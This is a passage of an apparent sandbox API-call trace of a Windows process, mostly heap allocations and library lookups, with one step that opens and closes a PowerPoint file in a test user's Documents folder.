(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.285] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0033.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x33) returned 0x7c2080 [0033.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", cchWideChar=51, lpMultiByteStr=0x7c2080, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpUsedDefaultChar=0x0) returned 51 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.286] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kh1fn.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=51, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x66) returned 0x7c10a8 [0033.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=51, lpWideCharStr=0x7c10a8, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx") returned 51 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.288] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.289] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.290] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.290] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.291] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.291] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0033.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8898c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.292] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.292] CloseHandle (hObject=0x140) returned 1 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.292] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.292] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.293] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.293] HeapFree (in: hHeap=0x770000, 